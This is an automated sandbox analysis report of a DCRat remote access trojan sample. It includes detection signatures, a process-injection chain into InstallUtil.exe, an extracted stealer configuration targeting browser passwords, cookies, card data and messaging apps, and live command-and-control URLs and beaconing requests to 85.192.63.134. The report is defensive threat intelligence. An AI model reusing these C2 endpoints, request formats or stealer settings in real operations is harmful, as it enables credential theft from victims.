Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
a9rLzLY498.exe

Overview

General Information

Sample Name:a9rLzLY498.exe
Original Sample Name:5a09955b26de8ecdfd90121d3e208825.exe
Analysis ID:1311370
MD5:5a09955b26de8ecdfd90121d3e208825
SHA1:f9ba5c15dca18cbbcac885c3d31b54b4416ff06f
SHA256:9a813ede666b2e709555af5fd3da93ee77a30a1f615c2036e9161932482bf022
Tags:exe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected DCRat
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

  • System is w10x64
  • a9rLzLY498.exe (PID: 6684 cmdline: C:\Users\user\Desktop\a9rLzLY498.exe MD5: 5A09955B26DE8ECDFD90121D3E208825)
    • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • InstallUtil.exe (PID: 6744 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: AF862061889F5B9B956E9469DCDAE773)
    • InstallUtil.exe (PID: 6752 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: AF862061889F5B9B956E9469DCDAE773)
  • cleanup
{"SCRT": "{\"5\":\";\",\"b\":\"^\",\"F\":\"#\",\"N\":\"*\",\"U\":\"`\",\"w\":\"<\",\"m\":\" \",\"G\":\"-\",\"8\":\"&\",\"V\":\",\",\"L\":\"@\",\"Z\":\"$\",\"c\":\"~\",\"Y\":\"_\",\"S\":\")\",\"i\":\"!\",\"B\":\".\",\"3\":\"%\",\"t\":\"(\",\"j\":\"|\",\"R\":\">\"}", "PCRT": "{\"m\":\"!\",\"B\":\"`\",\"K\":\" \",\"T\":\")\",\"F\":\"~\",\"d\":\".\",\"0\":\"*\",\"U\":\"$\",\"V\":\"-\",\"R\":\"^\",\"W\":\"&\",\"G\":\"@\",\"C\":\"%\",\"E\":\"|\",\"S\":\";\",\"l\":\"<\",\"x\":\"_\",\"I\":\">\",\"D\":\"(\",\"t\":\"#\",\"Q\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-8rQNupVUs4Gs7RYPGSpe", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 0, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z", "H2": "http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z", "T": "0"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.254163988.0000000002A21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000003.00000002.253884261.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        Process Memory Space: a9rLzLY498.exe PID: 6684JoeSecurity_DCRat_1Yara detected DCRatJoe Security
          Process Memory Space: InstallUtil.exe PID: 6752JoeSecurity_DCRat_1Yara detected DCRatJoe Security
            SourceRuleDescriptionAuthorStrings
            3.2.InstallUtil.exe.400000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              3.2.InstallUtil.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                3.2.InstallUtil.exe.400000.0.unpackMALWARE_Win_DCRatDCRat payloadditekSHen
                • 0xf6224:$x2: DCRat-Log#
                • 0x40a66:$x3: DCRat.Code
                • 0x40292:$v1: Plugin couldn't process this action!
                • 0x402dc:$v2: Unknown command!
                • 0xf62ae:$v4: Saving log...
                • 0xf62ca:$v5: ~Work.log
                • 0xf51df:$v8: %SystemDrive% - Slow
                • 0xf5209:$v9: %UsersFolder% - Fast
                • 0xf5233:$v10: %AppData% - Very Fast
                0.2.a9rLzLY498.exe.1356a70.1.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  0.2.a9rLzLY498.exe.1356a70.1.unpackMALWARE_Win_DCRatDCRat payloadditekSHen
                  • 0xf4424:$x2: DCRat-Log#
                  • 0x3ec66:$x3: DCRat.Code
                  • 0x3e492:$v1: Plugin couldn't process this action!
                  • 0x3e4dc:$v2: Unknown command!
                  • 0xf44ae:$v4: Saving log...
                  • 0xf44ca:$v5: ~Work.log
                  • 0xf33df:$v8: %SystemDrive% - Slow
                  • 0xf3409:$v9: %UsersFolder% - Fast
                  • 0xf3433:$v10: %AppData% - Very Fast
                  Click to see the 5 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 3.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: DCRat {"SCRT": "{\"5\":\";\",\"b\":\"^\",\"F\":\"#\",\"N\":\"*\",\"U\":\"`\",\"w\":\"<\",\"m\":\" \",\"G\":\"-\",\"8\":\"&\",\"V\":\",\",\"L\":\"@\",\"Z\":\"$\",\"c\":\"~\",\"Y\":\"_\",\"S\":\")\",\"i\":\"!\",\"B\":\".\",\"3\":\"%\",\"t\":\"(\",\"j\":\"|\",\"R\":\">\"}", "PCRT": "{\"m\":\"!\",\"B\":\"`\",\"K\":\" \",\"T\":\")\",\"F\":\"~\",\"d\":\".\",\"0\":\"*\",\"U\":\"$\",\"V\":\"-\",\"R\":\"^\",\"W\":\"&\",\"G\":\"@\",\"C\":\"%\",\"E\":\"|\",\"S\":\";\",\"l\":\"<\",\"x\":\"_\",\"I\":\">\",\"D\":\"(\",\"t\":\"#\",\"Q\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-8rQNupVUs4Gs7RYPGSpe", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 0, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z", "H2": "http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z", "T": "0"}
                  Source: a9rLzLY498.exeReversingLabs: Detection: 65%
                  Source: a9rLzLY498.exeAvira: detected
                  Source: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhBAvira URL Cloud: Label: malware
                  Source: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asynAvira URL Cloud: Label: malware
                  Source: http://85.192.63.134Avira URL Cloud: Label: malware
                  Source: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2ZAvira URL Cloud: Label: malware
                  Source: http://85.192.63.134Virustotal: Detection: 10%Perma Link
                  Source: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asynVirustotal: Detection: 5%Perma Link
                  Source: a9rLzLY498.exeJoe Sandbox ML: detected
                  Source: a9rLzLY498.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                  Source: a9rLzLY498.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0133F33A FindFirstFileExW,0_2_0133F33A

                  Networking

                  barindex
                  Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, type: UNPACKEDPE
                  Source: Malware configuration extractorURLs: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z
                  Source: Joe Sandbox ViewASN Name: LINEGROUP-ASRU LINEGROUP-ASRU
                  Source: global trafficHTTP traffic detected: GET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 85.192.63.134Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 85.192.63.134
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Sep 2023 07:47:20 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Sep 2023 07:47:21 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.134
                  Source: InstallUtil.exe, 00000003.00000002.254163988.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.254163988.0000000002C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.134
                  Source: InstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyn
                  Source: InstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: global trafficHTTP traffic detected: GET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 85.192.63.134Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 85.192.63.134
                  Source: a9rLzLY498.exe, 00000000.00000002.239742090.0000000001669000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_07c13133-9

                  System Summary

                  barindex
                  Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                  Source: 0.2.a9rLzLY498.exe.1320000.0.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 342.csLong String: Length: 368600
                  Source: a9rLzLY498.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                  Source: 0.2.a9rLzLY498.exe.1320000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0133D9690_2_0133D969
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0134199F0_2_0134199F
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_013230300_2_01323030
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0133802F0_2_0133802F
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_013398BA0_2_013398BA
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_013433230_2_01343323
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0132FD0C0_2_0132FD0C
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_013336B00_2_013336B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_029C453E3_2_029C453E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_029C5AE83_2_029C5AE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_029C8F203_2_029C8F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_029C8F123_2_029C8F12
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: String function: 0132A780 appears 51 times
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_01322540 GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,CreateProcessW,VirtualAllocEx,GetThreadContext,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,TerminateProcess,CreateProcessW,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,ResumeThread,0_2_01322540
                  Source: a9rLzLY498.exe, 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcrypto$ vs a9rLzLY498.exe
                  Source: a9rLzLY498.exeStatic PE information: Section: .data ZLIB complexity 0.9969699357588857
                  Source: a9rLzLY498.exeReversingLabs: Detection: 65%
                  Source: a9rLzLY498.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\a9rLzLY498.exe C:\Users\user\Desktop\a9rLzLY498.exe
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@0/1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 85Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, FsZ.csBase64 encoded string: 'H4sIAAAAAAAEAF2UX3eiMBDFP9C+EN2260MfWsu/rIaCECBvErSgAdkDK8qn31Ave2ofPGd+3Jk7M5D4/OzvFXOyQlRe6Ud+2W/EcInTqjm474x/MqFO/uheo1e6XJVG7cpgLgthut3Lhl65LdpFFQw0EQPntOyVV/bW1rBseWKVLPhMal4pXktDe8pFJf6qmXxg2ucyeS+TI03SM7Vlc5mld/nBPDuxOlO8kodvNcXFzpomEa2qxH1NJc9sJpugusvvrFgY3zw6q5I1tzMV3J5Pu0tVy7PesynuPQ7sngeie4lvz8b++VwO+h3czcUS0XSz7AyP/70sOy+CeGe8JplSTtZa8dbQ76PXO58fZqKhy6SNZrK1KjH6q0u8rfTM9UO8HRZjbZIeWS0Vm+dnWqdKJOmga55o6ZXyGLx9fsfl+tEtI24d3fbl4JVr4i/197yeDm7EeBjqmHzGJPp6BhxqBl+ZBVawHs9BZMswNyNBCRtykw1c8Z7XYUAdr/vgQcR5uKfEN8cZwGVfuqXu4VgmH+PFuJfeZ9wpQHwAG+AT2AT/AFPwnt74J/gX9Bb8BA4nHfkWWEF/A79Ad8AV9AS8g74Bd9Bj8BHMwX/AvXvjv+DjtA/8bHADPQJ/gFcTI38JLqB30/f2VfT2qtzW3ez1XXy/3UcVjedQ//bgLfg37mt+4+n+kvWN1Qr5PnT3xhz1HPUE/iSBHqMe/UiKfvBX0C0f/UPw1I8jnv5PPPSDTgLkT/NkYOxLsI+VQp/8MK9CP4J6BT+F+RXmJR7qmY5349mN9JkO6XX3D5suhGc4BQAA', 